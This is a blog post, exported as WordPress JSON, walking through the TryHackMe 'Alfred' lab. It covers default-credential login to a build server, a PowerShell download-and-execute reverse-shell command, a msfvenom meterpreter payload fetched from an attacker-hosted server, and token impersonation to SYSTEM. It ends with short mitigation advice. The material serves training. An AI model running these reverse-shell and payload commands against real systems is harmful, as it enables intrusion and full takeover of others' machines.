{"id":448,"date":"2021-11-17T22:57:07","date_gmt":"2021-11-17T22:57:07","guid":{"rendered":"https:\/\/nekrotic.co.uk\/?p=448"},"modified":"2021-11-17T22:58:41","modified_gmt":"2021-11-17T22:58:41","slug":"alfred-thm-write-up","status":"publish","type":"post","link":"https:\/\/www.nekrotic.co.uk\/?p=448","title":{"rendered":"Alfred &#8211; THM &#8211; Write-Up"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Introduction <\/h2>\n\n\n\n<p>The Alfred room on TryHackMe features the exploitation of Default login credentials in a development platform held on the server of a Windows machine, the abuse of a remote code execution feature to download and execute malware on a system and then elevating privileges by abusing misconfigured permissions in a meterpreter shell to elevate to system authority. <\/p>\n\n\n\n<p>This Write-Up will be made up of the following:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Enumeration <\/li><li>Initial Access <\/li><li>Enumeration Internal <\/li><li>Privilege Escalation <\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Enumeration <\/h2>\n\n\n\n<p>We first want to start with a Nmap scan to see what we are dealing with. Running Nmap with sudo allows us to perform an ARP scan but applying the -Pn flag also bypasses the ping scan if ICMP is blocked, and Nmap will stop the scan. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">sudo nmap -vv -A -Pn &lt;Target_IP&gt; <\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"825\" height=\"771\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-1.png\" alt=\"\" class=\"wp-image-452\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-1.png 825w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-1-300x280.png 300w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-1-768x718.png 768w\" sizes=\"(max-width: 825px) 100vw, 825px\" \/><\/figure>\n\n\n\n<p>The first thing we notice is ports 80, 3389 and 8080. Ports 80 and 8080 are hosting Websites; as for 3389 is safe to guess it is hosting RDP Server on a Windows Server 2008. <\/p>\n\n\n\n<p>We want to visit that IIS Webserver first to see what that is all about by browsing over to the IP address.  <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"946\" height=\"573\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-2.png\" alt=\"\" class=\"wp-image-453\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-2.png 946w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-2-300x182.png 300w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-2-768x465.png 768w\" sizes=\"(max-width: 946px) 100vw, 946px\" \/><\/figure>\n\n\n\n<p>That gave us sweet fuck-all, but we can now visit the 8080 port by appending :8080. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"913\" height=\"1024\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-3-913x1024.png\" alt=\"\" class=\"wp-image-454\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-3-913x1024.png 913w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-3-268x300.png 268w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-3-768x861.png 768w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-3.png 948w\" sizes=\"(max-width: 913px) 100vw, 913px\" \/><\/figure>\n\n\n\n<p>Fantastic login page. We love a good login page, and with a quick google search for &#8220;jetty default login&#8221;, we will find the login admin:admin, which will work. <\/p>\n\n\n\n<p>Investigating the jetty application, we can find that we have the feature to execute windows batch commands as part of the build process in the project options under configure. This could allow us to execute PowerShell scripts to gain a reverse shell. <\/p>\n\n\n\n<p>We first want to use the PowerShell script Invoke-PowerShellTcp.ps1, which can be found here in this GitHub repo: <a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcp.ps1\" title=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcp.ps1\">https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcp.ps1<\/a>.<\/p>\n\n\n\n<p>Downloading that script and placing it into your current working directory using the following command, then starting a python web-server to offer the script to the client, we then want to craft a payload for the client to execute where it downloads the script and uses the script to gain a reverse shell. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">wget https:\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Shells\/Invoke-PowerShellTcp.ps1 &amp;&amp; mv Invoke-PowerShellTcp.ps1.1 Invoke-PowerShellTcp.ps1<\/span><\/code><\/pre>\n\n\n\n<p>Our payload on the target would be as follows:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">powershell iex (New-Object Net.WebClient).DownloadString('http:\/\/&lt;Attacking_IP&gt;:8000\/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress &lt;Attacking_IP&gt; -Port &lt;Attacking_Port&gt; <\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"746\" height=\"381\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-5.png\" alt=\"\" class=\"wp-image-459\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-5.png 746w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-5-300x153.png 300w\" sizes=\"(max-width: 746px) 100vw, 746px\" \/><\/figure>\n\n\n\n<p>Once we have our listener and python HTTP Server listening, we build the project and wait for our shell. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"700\" height=\"247\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-7.png\" alt=\"\" class=\"wp-image-463\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-7.png 700w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-7-300x106.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" \/><\/figure>\n\n\n\n<p>We can now get our user flag and begin Enumeration for our route to root. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Internal Enumeration <\/h2>\n\n\n\n<p>Going through the usual Windows enumeration and using the following command, we notice we have SeDebugPrivilege, SeImpersonatePrivilege and SeCreateGlobalPrivilege. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">whoami \/priv <\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"697\" height=\"512\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-8.png\" alt=\"\" class=\"wp-image-465\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-8.png 697w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-8-300x220.png 300w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-8-80x60.png 80w\" sizes=\"(max-width: 697px) 100vw, 697px\" \/><\/figure>\n\n\n\n<p>We want a meterpreter shell to abuse this, load the incognito module, and steal the SYSTEM token. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Privilege Escalation<\/h2>\n\n\n\n<p>The first thing we will want to do is create our malware to move to the machine. We can do this through msfvenom using the following command: <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 --encoder x86\/shikata_ga_nai LHOST=&lt;Attacking_IP&gt; LPORT=&lt;Attacking_Port&gt; -f exe -o shell.exe<\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"945\" height=\"244\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-4.png\" alt=\"\" class=\"wp-image-455\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-4.png 945w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-4-300x77.png 300w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-4-768x198.png 768w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/figure>\n\n\n\n<p>We then start a python HTTP Server in the directory hosting the .exe and craft a payload to be executed on build with the following command to grab the binary and execute it: <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">Attacking Machine \nmsfvenom with the same configurations as your shellcode \npython3 -m http.server \n\n<code>\n<\/code>\nVictim Machine \npowershell \"(New-Object System.Net.WebClient).DownloadFile('http:\/\/&lt;Attacking_IP&gt;:8000\/shell.exe','shell.exe')\"<\/span>\n<span class=\"has-inline-color has-purple-color\">Start-Process shell.exe <\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"842\" height=\"1024\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-9-842x1024.png\" alt=\"\" class=\"wp-image-467\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-9-842x1024.png 842w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-9-247x300.png 247w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-9-768x934.png 768w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-9.png 941w\" sizes=\"(max-width: 842px) 100vw, 842px\" \/><\/figure>\n\n\n\n<p>We now have a meterpreter shell we want to load the incognito module, list the group tokens and then steal the Administrator token. We do this with the following meterpreter commands: <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">load incognito\nlist_tokens -g \nimpersonate_token \"BUILTIN\\Administrators\" <\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"603\" height=\"1024\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-10-603x1024.png\" alt=\"\" class=\"wp-image-469\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-10-603x1024.png 603w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-10-177x300.png 177w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-10.png 654w\" sizes=\"(max-width: 603px) 100vw, 603px\" \/><\/figure>\n\n\n\n<p>When we use the command getuid, we see we have a system shell and take the root.txt flag. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"312\" height=\"51\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-11.png\" alt=\"\" class=\"wp-image-470\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-11.png 312w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-11-300x49.png 300w\" sizes=\"(max-width: 312px) 100vw, 312px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Final Thoughts <\/h2>\n\n\n\n<p>As we can see, we can do a few things to stop this attack; starting strong, we can change our default credentials for our jetty webserver. After this, we should delegate the process to a low privilege user running the service with restricted permissions and remove the SeImpersonatePrivilege to remove the privilege escalation route. <\/p>\n","protected":false},"excerpt":{"rendered":"<p>Introduction The Alfred room on TryHackMe features the exploitation of Default login credentials in a development platform held on the server of a Windows machine, the abuse of a remote<\/p>\n<p><a href=\"https:\/\/www.nekrotic.co.uk\/?p=448\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\">Alfred &#8211; THM &#8211; Write-Up<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":451,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-448","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-write-up"],"_links":{"self":[{"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/posts\/448","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=448"}],"version-history":[{"count":10,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/posts\/448\/revisions"}],"predecessor-version":[{"id":472,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/posts\/448\/revisions\/472"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/media\/451"}],"wp:attachment":[{"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=448"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=448"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=448"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}